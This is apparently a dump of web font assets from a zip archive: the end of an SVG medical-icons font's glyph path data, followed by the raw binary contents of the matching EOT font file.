23.033-78.197 1.855-6.347-1.77-12.982-8.121-14.846-1.109-0.321-2.246-0.486-3.374-0.486-5.148 0-9.929 3.374-11.453 8.598l-21.985 74.766-0.057-0.028-9.787 0.028v-85.138l38.667-132.615zM311.98 767.441c0 15.454 12.557 28.035 28.011 28.035 15.478 0 28.030-12.581 28.030-28.035 0-15.469-12.552-28.040-28.030-28.040-15.459 0-28.011 12.571-28.011 28.040zM574.242 286.557c0-29.215-23.868-52.899-53.314-52.899-29.474 0-53.342 23.689-53.342 52.899 0 29.205 23.868 52.908 53.342 52.908 29.451 0 53.314-23.694 53.314-52.908zM300.395 286.090c0-29.106-23.59-52.719-52.734-52.719-29.111 0-52.724 23.618-52.724 52.719 0 29.13 23.613 52.734 52.724 52.734 29.144 0 52.734-23.604 52.734-52.734zM352.822 42.123h-211.359c0 12.788 0 84.308 0 103.325 0 37.26 30.607 67.537 67.914 67.537 18.526 0 54.796 0 72.827 0 37.303 0 70.618-30.281 70.618-67.537 0-19.017 0-90.541 0-103.325zM392.466 42.123l41.979 114.358c16.809 58.415 65.772 56.617 65.772 56.617h41.555c0 0 48.935 1.798 65.772-56.617l41.979-114.358h-257.057zM654.978 474.044h-73.001c-12.274 0-22.198 9.872-22.198 22.179 0 4.077 3.015 10.533 4.95 13.713l-89.121 89.126c-3.539 3.539-3.511 9.263 0.028 12.774 3.511 3.539 9.235 3.539 12.746 0l93.651-93.656 66.31-0.028 43.716 65.951c11.944 17.96 32.626 30.055 56.188 30.055h3.346c-0.033-6.649 0.491-47.326 14.26-61.676 10.32-10.344 21.235-9.443 21.235-9.443v-54.097c-6.639-2.765-11.283-9.306-11.283-16.927 0-10.146 8.183-18.356 18.333-18.356 10.179 0 18.385 8.211 18.385 18.356 0 7.635-4.7 14.176-11.358 16.927v53.852c0 0 12.515-1.123 23.132 11.778 10.174 12.637 12.5 41.489 12.42 58.868 34.203 0 63.129-33.32 63.129-70.345v-141.548h-183.848v138.032c-4.893-7.352-21.49-31.909-37.19-55.22-4.643-6.975-15.535-10.316-23.83-10.316zM847.112 290.611c0-29.087-23.613-52.762-52.724-52.762-29.144 0-52.734 23.67-52.734 52.762 0 29.158 23.59 52.757 52.734 52.757 29.111 0 52.724-23.599 52.724-52.757zM900.535 42.123h-211.303c0 12.783 0 84.308 0 103.325 0 37.26 33.268 67.537 70.628 67.537 18.021 0 54.244 0 72.742 0 37.326 0 67.933-30.276 67.933-67.537 0-19.017 0-90.537 0-103.325z" horiz-adv-x="1033" />
<glyph unicode="&#xe686;" d="M613.641 364.648h64.578v-251.297h-64.578v251.297zM613.641 506.131h64.578v-81.522h-64.578v81.522zM378.235 221.705l-93.658-42.022h130.825v210.129h-37.167zM398.127 132.741h-149.476c-23.343 0-23.429-32.929-0.095-32.929h150.936c-10.97 7.026-11.653 25.23-1.365 32.929zM906.6 947.257c0 0-778.724 0.247-778.468 0-71.756 0-112.109-37.111-112.109-112.924v-781.559c0-70.921 36.267-108.051 107.994-108.051h784.849c71.699 0 108.051 35.3 108.051 108.051v781.559c-0.009 73.965-36.352 112.924-110.317 112.924zM338.716 900.542c19.352 0 35.034-33.688 35.034-75.245 0-41.538-35.034-75.226-35.034-75.226s-35.015 33.688-34.996 75.226c-0.019 41.557 15.654 75.245 34.996 75.245zM338.716 690.385c0 0 35.034-33.707 35.034-75.245 0-41.557-15.682-75.245-35.034-75.245-19.342 0-34.996 33.688-34.996 75.245-0.028 41.548 34.996 75.245 34.996 75.245zM289.735 619.852c-29.393-29.374-64.294-42.107-77.985-28.425s-0.948 48.574 28.435 77.966 77.966 28.444 77.966 28.444 0.958-48.593-28.416-77.985zM209.911 848.261c13.701 13.682 48.593 0.967 77.995-28.407 29.374-29.412 28.416-77.985 28.416-77.985s-48.583-0.939-77.957 28.425c-29.402 29.393-42.117 64.303-28.454 77.966zM158.388 717.634c0 19.352 33.688 35.015 75.245 35.015s75.245-35.015 75.245-35.015-33.688-35.015-75.245-35.015-75.245 15.682-75.245 35.015zM464.043 50.792h-214.187c-35.707 0-66.569 31.507-66.569 70.040v241.313c0 24.519 9.292 42.515 34.987 55.002 0 0 159.934 71.168 160.133 71.443l-0.18-50.195h85.134v-299.255c-25.572-3.356-25.572-40.837 0.683-44.165v-44.184zM464.924 593.256c-13.672-13.682-48.583-0.948-77.966 28.444-29.393 29.374-28.444 77.966-28.444 77.966s48.593 0.948 77.976-28.425c29.383-29.393 42.126-64.294 28.435-77.985zM443.79 682.619c-41.548 0-75.236 35.015-75.236 35.015s15.834 16.45 39.177 26.804l-2.446 3.726c-23.182-8.505-44.923-8.126-44.923-8.126s-0.948 48.574 28.425 77.947c29.402 29.393 64.294 42.126 77.966 28.444 12.61-12.61 2.769-43.217-21.826-70.921 124.805 40.201 376.111 36.855 388.21 36.665l-0.408-25.666c-2.911 0.047-256.986 3.442-377.173-34.332 35.954-2.626 63.479-17.057 63.479-34.541 0-19.333-33.688-35.015-75.245-35.015zM861.487 566.263v-513.033h-305.143v513.849h64.578l-64.199 51.039 35.499 47.758 57.742-41.984-25.505 83.276 55.675 17.294 28.738-88.225h0.123l28.881 88.225 55.685-17.294-25.657-83.276 55.685 41.169 35.489-47.758-62.142-50.223h64.559v-0.815zM739.537 364.648h64.569v-251.297h-64.569v251.297zM739.537 506.131h64.569v-81.522h-64.569v81.522z" />
<glyph unicode="&#xe687;" d="M890.387 954.251h-748.577c-73.319 0-132.988-59.697-132.988-133.050v-748.511c0-73.38 59.669-133.045 132.988-133.045h748.577c73.343 0 133.040 59.664 133.040 133.045v748.511c0 73.352-59.697 133.050-133.040 133.050zM754.256 645.407c16.328 0 29.56-13.232 29.56-29.56s-13.232-29.56-29.56-29.56-29.56 13.232-29.56 29.56 13.237 29.56 29.56 29.56zM544.928 833.48c23.256 0 42.144-18.911 42.144-42.139 0-23.256-18.888-42.139-42.144-42.139s-42.111 18.883-42.111 42.139c0 23.233 18.855 42.139 42.111 42.139zM316.327 833.78c23.613 0 42.768-18.991 42.768-42.416 0-23.449-19.155-42.44-42.768-42.44-23.646 0-42.745 18.991-42.745 42.44 0 23.42 19.099 42.416 42.745 42.416zM188.068 573.219l33.684 117.304c13.434 46.846 52.708 45.413 52.708 45.413h83.649c0 0 39.217 1.433 52.703-45.413l16.459-57.335 16.459 57.335c13.458 46.846 52.703 45.413 52.703 45.413h108.117c0 0 39.274 1.433 52.736-45.413l33.379-116.426c0 0 26.309-2.396 26.666-2.396 10.099 0 69.355 0 79.759 0 20.917 0 39.302-16.985 39.297-37.902 0-10.653 0-67.598 0-74.729 0-7.159-5.613-12.993-12.772-12.993-7.102 0-12.936 5.839-12.936 12.993 0 8.314 0 65.7 0 65.7h-13.35c0 0 0-179.585 0-193.79 0-9.582-7.873-17.37-17.45-17.37s-17.338 7.788-17.338 17.37c0 14.2 0 103.649 0 103.649h-13.594c0 0 0-89.45 0-103.649 0-9.582-7.788-17.37-17.366-17.37-9.554 0-17.399 7.788-17.399 17.37 0 12.88 0 176.588 0 207.468-16.976 4.843-40.011 11.367-44.995 12.495-0.221 0.028-0.357 0.193-0.578 0.249-5.641 1.404-10.372 5.12-12.025 10.766l-31.415 114.331-15.98 0.028c0 0 0-314.316 0-334.519 0-13.65-11.208-24.722-24.886-24.722-13.622 0-24.689 11.071-24.689 24.722 0 20.208 0 190.328 0 190.328h-18.277c0 0 0-170.12 0-190.328 0-13.65-11.062-24.722-24.717-24.722-13.655 0-24.825 11.071-24.825 24.722 0 20.203 0 334.519 0 334.519l-14.726-0.028-32.256-112.626c-0.521-2.175-1.433-4.129-2.753-5.839-3.166-4.735-8.676-7.375-14.834-7.182-6.196-0.193-11.724 2.504-14.918 7.267-1.132 1.574-2.015 3.307-2.532 5.233l-32.397 113.147-15.933 0.028 47.395-197.98h-41.589v-140.612c0-11.593-9.441-21.011-21.053-21.011-11.583 0-20.94 9.418-20.94 21.011v140.617h-17.723v-140.617c0-11.593-9.47-21.011-21.053-21.011-11.616 0-20.94 9.418-20.94 21.011v140.612h-42.299l47.86 197.98-15.989-0.028-32.782-114.331c-2.475-8.756-12.274-13.599-21.852-10.846-9.606 2.781-15.609 11.123-12.415 22.105zM199.22 77.622c-20.532 0-40.1 5.148-59.035 13.514v26.554c19.235-9.827 38.752-15.985 59.035-15.985 44.032 0 84.489 26.45 125.943 58.57 4.899-3.88 9.742-7.624 14.67-11.56 1.592-1.292 3.222-2.555 4.815-3.824-45.164-35.286-92.282-67.269-145.427-67.269zM515.814 77.622c-61.271 0-114.495 42.468-165.958 83.526-23.449 18.714-46.32 36.906-69.36 51.054v-64.315c-8.065-5.284-16.102-10.127-24.111-14.284v89.924c0 0.601 0.244 1.127 0.329 1.677-14.975 7.046-30.142 11.809-45.695 13.486v-120.113c-4.021-0.521-8.037-0.907-12.081-0.907-4.021 0-8.037 0.385-12.030 0.907h0.009v120.17c-15.938-1.597-31.429-6.337-46.733-13.129v26.009c18.878 7.342 38.362 11.884 58.786 11.884 61.238 0 114.434-42.468 165.902-83.531 23.566-18.798 46.512-37.047 69.66-51.219v64.625c8.037 5.284 16.074 10.155 24.106 14.256v-90.060c0-0.634-0.272-1.184-0.352-1.79 14.975-7.022 30.166-11.753 45.765-13.406v120.066c3.824 0.47 7.657 0.883 11.504 0.883 4.213 0 8.399-0.385 12.612-0.963v-119.756c15.524 1.71 30.682 6.557 45.634 13.603-0.056 0.47-0.282 0.883-0.282 1.376v89.478c8.009-4.157 16.046-9 24.116-14.313v-63.69c14.721 9.056 29.362 19.653 44.14 31.072 4.819-3.824 9.606-7.539 14.505-11.424 1.658-1.325 3.33-2.645 4.988-3.964-45.216-35.234-92.362-67.133-145.455-67.133zM892.346 90.535c-19.047-7.981-38.752-12.908-59.397-12.908-53.286 0-100.507 32.148-145.784 67.542-6.741 5.284-13.458 10.649-20.146 15.957-8.446 6.769-16.84 13.458-25.205 19.898-41.369 32.040-81.742 58.41-125.698 58.41-44.117 0-84.602-26.507-126.107-58.683-5.035 3.964-10.019 7.849-15.111 11.889-1.466 1.156-2.917 2.311-4.383 3.467 41.749 32.646 85.208 62.145 133.538 66.527 3.993 0.362 7.981 0.883 12.053 0.883 4.044 0 8.060-0.221 12.053-0.578 48.194-4.321 91.488-33.985 133.129-66.522 6.952-5.421 13.866-10.954 20.748-16.431 8.281-6.609 16.459-13.129 24.599-19.437 41.618-32.256 82.155-58.842 126.309-58.842 20.424 0 40.077 5.834 59.397 15.139v-26.309zM892.346 224.496c-15.412 7.375-31.021 12.466-47.066 14.2v-119.921c-4.293-0.578-8.615-0.991-12.936-0.991-3.744 0-7.459 0.413-11.175 0.855v119.893c-15.44-1.658-30.523-6.412-45.385-13.35v-91.902c-8.037 4.101-16.074 8.972-24.111 14.228v64.728c-14.994-9.16-29.945-20.034-44.995-31.674-5.092 4.040-10.184 7.948-15.337 12.077-1.376 1.099-2.781 2.208-4.157 3.302 45.385 35.427 92.719 67.575 146.037 67.579 20.532 0 40.161-4.866 59.12-12.772v-26.253z" />
<glyph unicode="&#xe688;" d="M897.428 942.338c0 0-773.449 0.244-773.223 0-71.285 0-111.362-36.855-111.362-112.151v-776.267c0-70.44 36.028-107.313 107.266-107.313h779.546c71.229 0 107.304 35.041 107.304 107.313v776.267c0.009 73.465-36.065 112.151-109.53 112.151zM837.435 334.204h-209.225v-209.225h-240.781v209.225h-209.225v240.772h209.225v209.225h240.781v-209.225h209.225v-240.772z" horiz-adv-x="1015" />
<glyph unicode="&#xe689;" d="M887.273 954.584l-748.553 0.005c-73.352 0-133.021-59.674-133.021-133.054v-748.497c0-73.385 59.674-133.054 133.021-133.054h748.553c73.324 0 133.021 59.669 133.021 133.054v748.492c0 73.38-59.697 133.054-133.021 133.054zM714.667 441.692c-6.355-41.035 6.581-87.031-5.637-179.458-12.659-93.362-34.595-175.273-77.284-175.273-50.481 0-43.713 93.165-37.822 168.979 1.733 22.815 3.002 42.524 1.79 56.038-5.12 56.475-29.428 96.256-81.826 96.256-52.102 0-76.734-39.781-81.835-96.256-1.212-13.514 0.061-33.224 1.794-56.038 5.89-75.814 12.626-168.979-37.827-168.979-42.689 0-64.625 81.911-77.279 175.273-12.222 92.428 0.714 138.423-5.641 179.458-12.166 77.758-80.013 147.475-59.068 246.62 11.64 54.995 41.918 80.868 71.891 91.737 69.139 25.154 113.758-23.312 187.96-23.312 74.207 0 118.826 48.466 187.937 23.312 30.001-10.869 60.28-36.742 71.896-91.737 20.969-99.145-46.911-168.861-59.049-246.62z" />
<glyph unicode="&#xe68a;" d="M859.366 530.054c0 50.559-40.979 87.624-91.528 87.624-2.297 0-4.594-0.105-6.862-0.239v-175.697c2.268-0.163 4.565-0.278 6.862-0.278 50.559 0 91.528 38.032 91.528 88.59zM901.56 948.324h-773.723c-65.038 0-117.75-52.712-117.75-117.741v-773.723c0-65.029 52.712-117.741 117.75-117.741h773.723c65.029 0 117.741 52.712 117.741 117.741v773.723c0 65.029-52.712 117.741-117.741 117.741zM286.289 674.61l474.686-0.115c2.268 0.096 4.565 0.153 6.862 0.153 83.423 0 151.045-61.162 151.026-144.585 0-83.394-67.613-146.183-151.045-146.183-2.287 0-4.584 0.086-6.852 0.182v-22.279c0-46.788-37.945-84.734-84.734-84.734h-305.219c-46.807 0-84.734 37.955-84.734 84.734v312.827zM935.553 255.842c0-46.788-37.945-84.734-84.734-84.734h-659.274c-46.798 0-84.734 37.945-84.734 84.734v2.938h828.732v-2.938z" />
<glyph unicode="&#xe68b;" d="M515.133 629.746c0 0-32.73-17.281-32.73-70.008v-52.572h65.48v52.572c0.005 52.727-32.749 70.008-32.749 70.008zM882.805 948.806h-748.544c-73.348 0-133.017-59.688-133.017-133.050v-748.492c0-73.376 59.669-133.064 133.017-133.064h748.544c73.343 0 133.040 59.688 133.040 133.064v748.492c0.005 73.366-59.693 133.050-133.040 133.050zM804.723 54.549h-233.566v124.186c0 63.685-57.631 84.541-57.631 84.541s-57.64-20.856-57.64-84.541v-124.186h-229.897v257.531l193.813 93.607v248.461l95.457 199.483 95.561-199.483v-248.461l193.898-93.607v-257.531z" horiz-adv-x="1019" />
<glyph unicode="&#xe68c;" d="M885.91 954.081h-748.567c-73.348 0-133.017-59.679-133.017-133.031v-748.525c0-73.376 59.669-133.045 133.017-133.045h748.563c73.348 0 133.045 59.669 133.045 133.045v748.525c0.005 73.357-59.693 133.031-133.040 133.031zM132.336 475.7l224.834 34.412h208.046c35.121 0 63.356-28.357 63.356-63.263 0-34.731-27.991-62.826-62.896-63.108l-225.571 0.033c-14.998 0.193-27.108 12.387-27.108 27.441 0 15.196 12.302 27.493 27.474 27.493h116.534l94.898 19.818-5.148 24.524-92.338-19.292h-113.946c-28.959 0-52.548-23.561-52.548-52.534 0-10.076 2.997-19.433 7.952-27.441l-163.539 0.028v91.888zM132.829 293.277v49.072h623.367v-49.072h-623.367zM644.617 445.839c0 34.323 27.798 62.098 62.093 62.098 34.238 0 62.14-27.78 62.14-62.098 0-34.205-27.902-62.116-62.14-62.116-34.295 0-62.093 27.911-62.093 62.116zM890.42 96.218c0-15.332-12.41-27.714-27.737-27.714 0 0-374.286 0.028-385.677 0.028-15.304 0-26.37 14.951-24.938 30.194 0 10.254 0 105.979 0 110.681 0 29.865 143.994 33.139 143.994 0.442v-75.114c137.813 36.742 238.437 163.084 238.926 312.033-0.052 149.044-101.174 274.803-238.926 311.747v-84.475h-144.112c0 0 0 109.108 0 119.263-1.376 15.275 9.883 28.733 25.135 30.138 224.369 20.405 413.367-156.583 413.367-376.78 0-0.55-0.033-350.443-0.033-350.443z" horiz-adv-x="1019" />
<glyph unicode="&#xe68d;" d="M493.199 731.975h31.342v26.058h26.082v31.328h-26.082v26.166h-31.342v-26.166h-26.086v-31.328h26.086zM882.118 949.232h-745.187c-73.017 0-132.414-59.415-132.414-132.442v-745.070c0-73.041 59.401-132.456 132.414-132.456h745.187c73.017 0 132.409 59.415 132.409 132.456v745.070c0.005 73.031-59.397 132.442-132.409 132.442zM509.087 832.991c44.71 0 117.924-18.797 158.748-63.413l-54.964-105.472c-23.945 31.029-61.538 50.985-103.784 50.985-41.755 0-78.937-19.521-102.91-49.947l-56.030 102.087c47.183 47.174 112.308 65.76 158.94 65.76zM609.804 588.134c0-55.647-45.178-100.759-100.88-100.759-55.642 0-100.745 45.112-100.745 100.759 0 55.647 45.103 100.759 100.745 100.759 55.703 0 100.88-45.112 100.88-100.759zM312.722 371.368c9.151 31.982 49.592 88.7 119.518 89.037l157.182-0.136c68.36-1.683 107.978-57.302 117.017-88.906l57.84-191.399h-84.744l-36.915 126.326h-25.829l36.691-126.326h-287.992l36.855 126.326h-25.81l-36.827-126.326h-85.946l58.962 191.404zM885.952 67.96h-753.898v71.731h753.893v-71.731z" horiz-adv-x="1019" />
<glyph unicode="&#xe68e;" d="M884.713 953.56h-748.553c-73.352 0-133.021-59.674-133.021-133.050v-748.483c0-73.376 59.669-133.073 133.021-133.073h748.553c73.352 0 133.021 59.697 133.021 133.073v748.483c0 73.38-59.674 133.050-133.021 133.050zM714.649 818.693c34.379 0 62.29-27.883 62.29-62.257 0-34.379-21.993-62.286-62.29-62.286-34.398 0-62.286 27.906-62.286 62.286 0 34.374 27.883 62.257 62.286 62.257zM579.927 623.052c5.778 20.146 31.237 55.846 75.33 55.846h118.765c44.117 0 69.599-35.694 75.33-55.846l43.374-145.906h-53.971l-31.767 109.963h-20.889l30.631-109.963h-204.171l30.607 109.963h-20.884l-31.706-109.963h-53.971l43.323 145.906zM300.023 819.27c34.403 0 62.314-27.883 62.314-62.286 0-34.407-27.902-62.314-62.314-62.314s-62.286 27.906-62.286 62.314c0 34.403 27.883 62.286 62.286 62.286zM300.981 512.442c-1.954 3.438-7.91 17.774-12.72 29.541l-41.2-173.944c0.028-96.261 0.061-269.495 0.061-269.495 0.085-26.807-18.244-48.635-45.028-48.715-26.807-0.113-46.183 21.523-46.376 48.358 0 0-0.249 303.137-0.249 318.116s5.919 50.505 9.357 63.634l38.644 162.863c6.745 28.414 35.29 46.277 63.61 39.274 24.877-6.163 36.991-23.561 41.89-35.807 5.801-14.482 31.674-79.957 37.728-93.499 2.123-4.678 6.609-7.154 7.52-7.567 5.12-2.283 17.864-6.741 40.983-17.154l13.044-5.876-11.311 21.626-18.192 34.708c0 0-2.424 6.055 2.945 8.643 5.97 2.889 9.193-1.982 9.193-1.982l54.826-102.231c0 0 4.547-9.968 1.949-18.207-9.084 0.493-15.224 11.311-15.224 11.311l-0.991 1.898-2.884-5.97c-7.952-10.019-21.607-14.284-34.182-9.47-20.865 9.521-74.808 31.843-74.808 31.843-9.366 4.397-13.937 9.982-18.587 18.103zM496.001 480.383l15.773-16.929-121.382-112.978-15.783 16.919 121.391 112.988zM895.117 399.506h-343.688c-11.72 0-18.056-6.604-21.8-10.076-15.139-14.068-115.905-107.069-115.905-107.069l-30.274 29.86c0 0 113.424 110.042 127.573 123.223 8.206 7.567 18.061 11.644 28.461 11.644h355.633v-47.583z" horiz-adv-x="1019" />
<glyph unicode="&#xe68f;" d="M562.536 282.542c-12.601 1.071-23.702-8.253-24.828-20.849-1.015-12.629 8.271-23.702 20.99-24.8 12.494-1.094 23.561 8.248 24.655 20.91 1.127 12.55-8.243 23.669-20.817 24.74zM526.065 333.279c-8.412 0-15.262-6.901-15.262-15.313 0-8.444 6.85-15.295 15.262-15.295 8.44 0 15.313 6.85 15.313 15.295 0 8.407-6.878 15.313-15.313 15.313zM535.187 367.66c8.384 0 15.318 6.822 15.318 15.29 0 8.356-6.934 15.234-15.318 15.234-8.44 0-15.29-6.878-15.29-15.234 0-8.468 6.85-15.29 15.29-15.29zM378.080 543.564c-18.577 0-33.614-15.014-33.614-33.591 0-18.493 15.037-33.563 33.614-33.563 18.549 0 33.54 15.065 33.54 33.563 0 18.577-14.991 33.591-33.54 33.591zM580.725 374.239c-12.793 0-22.958-10.217-22.958-22.851s10.165-22.879 22.958-22.879c12.55 0 22.766 10.245 22.766 22.879s-10.217 22.851-22.766 22.851zM880.715 951.013h-745.168c-73.017 0-132.419-59.401-132.419-132.419v-745.107c0-73.050 59.401-132.447 132.419-132.447h745.168c73.013 0 132.386 59.397 132.386 132.447v745.107c0.005 73.017-59.369 132.419-132.386 132.419zM359.826 49.945h-270.041c0 0 23.538 259.324 25.838 262.036 2.357 2.604 49.535-2.932 49.535-40.268 0-26.876 0.14-56.657 0.248-73.209l171.27 170.943c9.043 9.043 23.669 9.015 32.656 0 9.015-9.043 9.015-23.646 0-32.656l-133.134-133.017 13.513-13.536 169.657 169.484c9.010 9.015 23.641 9.015 32.651-0.028 9.020-9.015 8.987-23.646-0.028-32.656l-169.624-169.488 13.513-13.508 145.819 145.675c9.043 9.015 23.674 9.015 32.66-0.033 9.015-9.006 9.015-23.636 0-32.646l-145.843-145.651 13.541-13.536 108.773 108.689c9.010 9.020 23.646 9.020 32.66 0 9.015-9.043 9.015-23.646-0.005-32.66l-108.811-108.717 0.192-0.164-15.042-15.051zM791.014 305.224v-255.271h-321.223v83.374l27.129 27.096c16.44 16.44 16.44 43.097 0 59.542-6.050 6.055-13.508 9.857-21.34 11.446l12.218 12.19c16.44 16.412 16.44 43.064 0.028 59.504-6.107 6.116-13.639 9.945-21.532 11.507 15.482 16.501 15.29 42.391-0.823 58.499-16.445 16.468-43.073 16.468-59.514 0.033l-11.704-11.699c-1.594 7.865-5.396 15.337-11.451 21.42-16.435 16.445-43.069 16.445-59.532 0.033l-38.253-38.22h-21.425c-13.401 0-24.249 10.871-24.249 24.193 0 3.418 0.655 6.569 1.884 9.473l62.74 158.117c0 0 6.574 65.485 12.442 90.636 26.222 112.804 152.038 215.246 288.59 215.246 166.313 0 301.005-134.612 301.005-300.752 0-95.891-45.070-181.374-114.992-236.366zM613.212 311.107c-8.487 0-15.365-6.878-15.365-15.234 0-8.487 6.878-15.304 15.365-15.304 8.449 0 15.271 6.817 15.271 15.304 0 8.356-6.822 15.234-15.271 15.234zM647.388 547.679h-5.344v-27.265l5.316-0.028c34.021-0.056 61.814-27.784 61.922-61.814-0.108-34.030-27.9-61.758-61.95-61.814l-5.288-0.056v-27.288h5.344c49.203 0 89.21 40.006 89.21 89.163s-40.001 89.102-89.21 89.102z" horiz-adv-x="1019" />
</font></defs></svg>PK!�~��e�eFit_sanctum/fonts/webfont-medical-icons/fonts/webfont-medical-icons.eotnu&1i��e�d�LP~�L�*webfont-medical-iconsRegularVersion 0.0*webfont-medical-icons�0OS/2���`cmap̀�<gaspXglyfb�K`]�head�{K_06hhea�]_h$hmtxAP�_�Hloca.[Ѡa�&maxp�pb� namec��c�postd� �������3	@ �������@ ( �� �������79���{�=]r".54>32#.'#!#'.7>130"#33535#5>54.#".54>32#."".-"#-S

`/��Ú/`


c43%�&24c
�� 8*$0../..0#*8 ''''�"..!!.."��	
P����
	X4774��1*8 3)*.//.*)3 8*��''''
0����0F\s���-%772#".'>332>7'6.#"+'3'>;2!".7>;23>56./&".7&>32#3'2>7.#";'*&5".4'7&>32#726##73#&/.;2>7>&/.+";2>?>&'..5"4&672>7'
��&A??$&##	
	
E

�H

=

����

=

��
�	

�	
��3$%21&&1$$&&4C�
O

�2!� 3�

O
�,		�$##$�C���	����	��L&
&"%22%%22%"&&&&UO= �Y<^
��
^<Y����'4B^w�>4&'71'>4&'>&''>4&''>4&'#'3".'.467>32>510<14.+0:92>510<14.+0:9�))((%$%%4!!!!)$


	

	�CE44FF^
J
J")gjg)%]a]%T!TVT!JNJ�@CA676$-/,#%#


�$b����i%--/1 	�e?L?
���ANA
��6����!.C�%>&/3!!3'!!#'7"&'267'>&'.67.'0.'>14.#"7.#0"72>3067>7>&'s
U�g�6�3M!�>cDJ?I���J #$# �JL "
	
!"	Q '�5�
M��"Z��j�xIJJI!��;)	L2:
	



7����3Mg�����7Qk����32+".=4>31;2+".=4>31!32+".=4>31!32+".=4>31;2+".=4>3132+".=4>31;2+".=4>31!32+".=4>31!32+".=4>31;2+".=4>31%32+".=4>31#32+".=4>31!32+".=4>31;2+".=4>31!2#!".=4>31.'&34>7>23310:12>=#09!30:612>=#013�O

O

�OO

�|O

O

�}N

N
�OO

�O

O

�O

O

�|O

O�}OO

�O

O

�O

O

�O

O�}OO

�O

O

��

�p�"Z����`#�*),-�
;E;
�_
<H<	�O
=

=

=

=

=

=

=

=

=

=
��<

<<

<<

<<

<<

<�
==

==

==

==
��
;;
�>?10@A


V

D

D!����#(6@U���&4>?626.'.>7'!!#".54>;4>3!!57#".54>32'.+">7>./733.'.47>?'36?>&'#".'#32>5<&'#'>323.#"33/73*\
\
�6��$�������####6�
6	~
	d'Li	L'e�	

	F''FG		<;{"%3

2760#����@�
�@	�`�""##�

�

T	
BN?2




2?NB
	T

b&&

		���737373737!####!����
������7����[�������k�
#8=B��%#".=3#5##5!#".=32#".54>3!!!!32#".'0#<1#".54>;5#".54>;5#".54>;5#".54>;5#".54>;5332+32+32+32+!"!.#)

	
_~�-�>��


`�-""--""-_�A�n� ��X

/

X\\ggaaLL/LLaagg\\y��$!
	$6



**rDD�*



**!-.!!.-!����ey��X�		a

	���I;P`��2>54.#"30" "#"1032(12>4150.+"#732>54.#"%35801!'.'.>7*1";3.54>;7#"!>54.#%".'&4>?'5#0>7>;2�""##���(\
\!J



��	L�+���?-3;0

�?��

j
�uy�
		

��

�)#gdq>L@

!B��""""��
M
�



�
�e�>

	
_	
		
 


K

2c
U%gmDSF"&�6����-<AZ_di#'>54.+35326:3373'7'#532#3!2>5!!!'!2>=4.#!"3%3#5#3#5#3#5�$&1	

"f3.E9$'&5A8�%!

�

�
	�7-o��D��
�78�DZ#���}fFFve.p

��

����T���vvvvvv	���R�z���$Xm2>'6.#"3".3.032>732>746&6'6.'&"&""#".5&6&6'>7.+"#63">323">##".'6&6&7#.7&>7'3'33##'#'4>?>22"3#".'".7&>32#3".'>32#7".7&6465>47.'.7"2"6#>76#2>7.#"3�

)
	


�##!%	3F&(D4SCLCAJA�
	
	
�&&$$�$$%%�
		
!
�

�
		
[

		F		#


'E33E'


#�oKBBKBB	 :50


	$7$��%%%%%%%%�		


05: $7$/
		
����2G\q�������%'7>'6.'7'7''77#*3!'2*#"32>7.#".'>32#':3&6&6'*#7"32>'6.#73#".'>32#7".7&>32#7".'>32#".7&>32#7".'>32#i���)*>$oG��#=!s*'E[5"I:&<'.��/V?%%?V/2T@$$@T2-L:!!:L-+N9""9N+z

{(B33B(%D00D%�KMP	

	

-			

	




A			

			

			q�(�t9@F%.VL@�0)0�#;#;�.7>!4\D(__�%@U01U?%%?U10U@%�B!:M,,M:!!:M,,M:!��2C&&C22C&&C2�NN�



T��

p���!���>56.#&'.'6&64?''7>7'3>/&4./7223>74.'.1.4/.'>'6.� 

�	�i
Hn	
~
	
Z
	#*!	
#'%)
7		

 �		/�
24+

���

k&&IO@	���	
�

�\


	F[����*?Tif{!5#".=#".5<64?0>7>32"32>54.#%32>54.#"%32>54.#"75'.'7'.'&"&"1'#'5'.'7'.'0*/#"'"730:337>77'>506<5772213'17:23372>77'>706<?5'.'7'.'"&*#'#7>77'>74646532>54.#"�h< 6)3PEcyAP�h<&6!��				r	

	��		�:8"(/8	0(!0%$ &%% 8"(/10(!�		��u)7k�%'6cL-<h�P-VMB/		]		,	

	Y
8
1(!;8"'/ &%% '%.
0(!;4"'/�	

	
����(IV[`ej���.54>76754.'%.54>765'5557%%%%%%.54>7'%%.54>7'2 ����������@AA@@@��;��t��t���Ssoos��Ssooa�<����B@??AAi��7�<6��p8����V����V���� Qg5##335352>54.#"35"#".54>7>;2#*./!717'.>5'76�kkkkk�1$$10%%0�w�"�"�w�dΚ'5(��(5'�;kkjkkj��$11$$11$��v!


��
!vR384 �CC� 483	����)-1FUYu�"32>54.#3"32>54.#37%37%2>54.#"333##!'!'.#"!7>4'"&"&'.?3#1�

�

��/-.���J!0!#..##.�*�SS��I%B�_71U�"8+�~�Q/t9
	m��R���#//##//#�	����5�V���Ƙ#
�

���
����2Gg%'7>7.'7'7''77#*#!7*#'3'#3#'3'#3#!#!332>'332>733^���*/?)xN��$@%|. +Hb7&L?'_,/��YBZb�a?��B
BA��*�{<DK(1[QD�3-3�?%?�1:B#8aI*ffQQQQ�l���O��


��


�������=Rg�".54>32#.'#!#'.7>130%"32>54.#.67>&'&'.'.1.'.>7>1>7'"./.>76201/""//##/\
b0����0b

e54&�'36e

��'F33F''E44E')		
*
	



	�#..##..#��		X��$��		`5885���4E('E44E'(E4�
		@

#7,

����%2G\�6"./!&>;227#7##337372>7.#"32>'6.#"3"'7''7'77>733#

�

B��c
h	*:8�@K?=I>,##,/  /�.!!.,##,'G�
"�H�
	���'
23��!--)�>>K>>KL"--""--""--""--"!
'B'��

&���:����!�%>&/3!!3'!!#''32#".'#5#".54>;5#".54>;5#".54>;5#".54>;5#".54>;5332+32+32+32+r

T�n�5�2M!�C]DI��P�������P������V &�9�
L��#X��o�M2 0 (#bb#(!0 2333333<����#=Ubk%>&/3!!3'/!!#'+#32'.+32>7>'6.'%#3#3#3%##'#'3n
U�u�4�6!�GVD�
<;x

.	64	=������T:T�X &�>�
N��6Q"X��s@9e
fS
	<1H3222��24����#E���%>&/3!!3'/!!#'3#5<5<5#'#37#.5.4&=4.'.+#3232>7>54.'.+#3m

U�l�6�6!�A_C�V76:58W43D
A	
:;�

{@	A;;S '�8�
O��7R"Y��m@�������


	
	p*M
	���7����#v��%>&/3!!3'/!!#'>32#.'.#"32>7>73#".'.54>7%3#'##3'%##5#53q

T�k�6�6!�@aD�a	
<

;


	
	
	=DeAi?fI$%�U<V�U '�7�N��7R#Y��l@�	
	

	
		


!
��::�pp�2��28����#v%>&/3!!3'/!!#'>32#.'.#"32>7>73#".'.54>7%##5#53r

T�l�6�6 �B_D��	
;	

;

	
	
